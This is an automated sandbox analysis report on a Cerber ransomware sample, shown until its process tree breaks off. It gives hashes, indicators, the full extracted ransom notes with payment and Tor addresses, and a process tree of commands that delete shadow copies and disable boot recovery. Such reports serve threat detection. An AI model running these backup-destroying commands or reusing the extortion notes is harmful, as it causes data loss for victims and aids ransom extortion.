Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2025, 20:00

General

  • Target

    0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe

  • Size

    255KB

  • MD5

    1382caad112ebbb4d00257696a7bd9a6

  • SHA1

    0a269602c823be96cc240fe7595cd05a6c24b8b7

  • SHA256

    0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b

  • SHA512

    ae105b757f81d7c479068b88de23a2b096c07f637c07fa024c6ab427310e94dc474ea0cf4ad92143304c94b20a5908051a1c648d91e63e96a889a1999bc1b057

  • SSDEEP

    6144:GwHysO+Bb4cnEWkwM3qKq6qKm3cskuxru5vg:9O+B7Jeqv6dm30vg

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber &#082;ansomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .upd_on { color: red; display: block; } .upd_off { display: none; float: left; } .tor { padding: 10px 0; text-align: center; } .url { margin-right: 5px; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!<br>You have turned to be a part of a big community "#C3rber Ransomware".</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">!Any attempts to get back your files with the third-party tools can be fatal for your encrypted files!</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files!</p> <p>When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><span class="upd_off" id="upd_1">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061" id="url_1" target="_blank">http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061</a>(<a href="#updateUrl" onClick="return updateUrl();" style="color: red;">Get a NEW address!</a>)</li> <li><a href="http://52uo5k3t73ypjije.mustspace.us/7D06-AB1D-FDD0-0072-B061" target="_blank">http://52uo5k3t73ypjije.mustspace.us/7D06-AB1D-FDD0-0072-B061</a></li> <li><a href="http://52uo5k3t73ypjije.effortany.win/7D06-AB1D-FDD0-0072-B061" target="_blank">http://52uo5k3t73ypjije.effortany.win/7D06-AB1D-FDD0-0072-B061</a></li> <li><a href="http://52uo5k3t73ypjije.boxsame.kim/7D06-AB1D-FDD0-0072-B061" target="_blank">http://52uo5k3t73ypjije.boxsame.kim/7D06-AB1D-FDD0-0072-B061</a></li> <li><a href="http://52uo5k3t73ypjije.onion.to/7D06-AB1D-FDD0-0072-B061" target="_blank">http://52uo5k3t73ypjije.onion.to/7D06-AB1D-FDD0-0072-B061</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <span class="upd_off" id="upd_2">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061" id="url_2" target="_blank">http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <span class="upd_off" id="upd_3">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061" id="url_3" target="_blank">http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <span class="upd_off" id="upd_4">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061" id="url_4" target="_blank">http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://52uo5k3t73ypjije.onion/7D06-AB1D-FDD0-0072-B061</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> <script> function getXMLHttpRequest() { if (window.XMLHttpRequest) { return new window.XMLHttpRequest; } else { try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } } function getUrlContent(url, callback) { var xhttp = getXMLHttpRequest(); if (xhttp) { xhttp.onreadystatechange = function() { if (xhttp.readyState == 4) { if (xhttp.status == 200) { return callback(xhttp.responseText.replace(/[\s ]+/gm, ""), null); } else { return callback(null, true); } } }; xhttp.open("GET", url + '?_=' + new Date().getTime(), true); xhttp.send(); } else { return callback(null, true); } } function server1(address, callback) { getUrlContent("http://btc.blockr.io/api/v1/address/txs/" + address, function(result, error) { if (!error) { var tx = /"tx":"([\w]+)","time_utc":"[\w-:]+","confirmations":[\d]+,"amount":-/.exec(result); if (tx) { getUrlContent("http://btc.blockr.io/api/v1/tx/info/" + tx[1], function(result, error) { if (!error) { var address = /"vouts":\[{"address":"([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); } }); } function server2(address, callback) { getUrlContent("http://api.blockcypher.com/v1/btc/main/addrs/" + address, function(result, error) { if (!error) { var tx = /"tx_hash":"([\w]+)","block_height":[\d]+,"tx_input_n":[\d-]+,"tx_output_n":-/.exec(result); if (tx) { getUrlContent("http://api.blockcypher.com/v1/btc/main/txs/" + tx[1], function(result, error) { if (!error) { var address = /"outputs":\[{"value":[\d]+,"script":"[\w]+","spent_by":"[\w]+","addresses":\["([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } }

Extracted

Path

C:\Users\Admin\AppData\Roaming\# DECRYPT MY FILES #.txt

Ransom Note
C_E_R_B_E_R R_A_N_S_O_M_W_A_R_E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable??? It is normal because the files' names, as well as the data in your files have been encrypted. Great! You have turned to be a part of a big community "#Cerb3r Ransomware". ######################################################################### !!! If you are reading this message it means the software "Cerber" has !!! been removed from your computer. !!! HTML instruction ("# DECRYPT MY FILES #.html") always contains a !!! working domain of your personal page! ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to return your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061 | | 2. http://52uo5k3t73ypjije.mustspace.us/7D06-AB1D-FDD0-0072-B061 | | 3. http://52uo5k3t73ypjije.effortany.win/7D06-AB1D-FDD0-0072-B061 | | 4. http://52uo5k3t73ypjije.boxsame.kim/7D06-AB1D-FDD0-0072-B061 | | 5. http://52uo5k3t73ypjije.onion.to/7D06-AB1D-FDD0-0072-B061 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://52uo5k3t73ypjije.onion/7D06-AB1D-FDD0-0072-B061 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061

http://52uo5k3t73ypjije.mustspace.us/7D06-AB1D-FDD0-0072-B061

http://52uo5k3t73ypjije.effortany.win/7D06-AB1D-FDD0-0072-B061

http://52uo5k3t73ypjije.boxsame.kim/7D06-AB1D-FDD0-0072-B061

http://52uo5k3t73ypjije.onion.to/7D06-AB1D-FDD0-0072-B061

http://52uo5k3t73ypjije.onion/7D06-AB1D-FDD0-0072-B061

Signatures

  • Cerber 2 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Cerber family
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Contacts a large (530) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Control Panel 4 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe
    "C:\Users\Admin\AppData\Local\Temp\0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4736
    • C:\Users\Admin\AppData\Local\Temp\0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe
      "C:\Users\Admin\AppData\Local\Temp\0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe"
      2⤵
      • Cerber
      • Modifies visiblity of hidden/system files in Explorer
      • Adds policy Run key to start application
      • Drops startup file
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Users\Admin\AppData\Roaming\{A9B9797B-2350-5224-D0C5-BE661FD62C90}\RdpSaProxy.exe
        "C:\Users\Admin\AppData\Roaming\{A9B9797B-2350-5224-D0C5-BE661FD62C90}\RdpSaProxy.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Users\Admin\AppData\Roaming\{A9B9797B-2350-5224-D0C5-BE661FD62C90}\RdpSaProxy.exe
          "C:\Users\Admin\AppData\Roaming\{A9B9797B-2350-5224-D0C5-BE661FD62C90}\RdpSaProxy.exe"
          4⤵
          • Cerber
          • Modifies visiblity of hidden/system files in Explorer
          • Adds policy Run key to start application
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies Control Panel
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4420
          • C:\Windows\system32\vssadmin.exe
            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:5064
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1440
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2140
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:4872
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\# DECRYPT MY FILES #.html
            5⤵
            • Enumerates system info in registry
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1052
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff969aa46f8,0x7ff969aa4708,0x7ff969aa4718
              6⤵
                PID:4564
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
                6⤵
                  PID:2288
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
                  6⤵
                    PID:4396
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
                    6⤵
                      PID:116
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                      6⤵
                        PID:4540
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                        6⤵
                          PID:4616
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
                          6⤵
                            PID:5016
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
                            6⤵
                              PID:1360
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
                              6⤵
                                PID:2844
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8
                                6⤵
                                  PID:2756
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8
                                  6⤵
                                    PID:2132
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
                                    6⤵
                                      PID:1720
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
                                      6⤵
                                        PID:1100
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
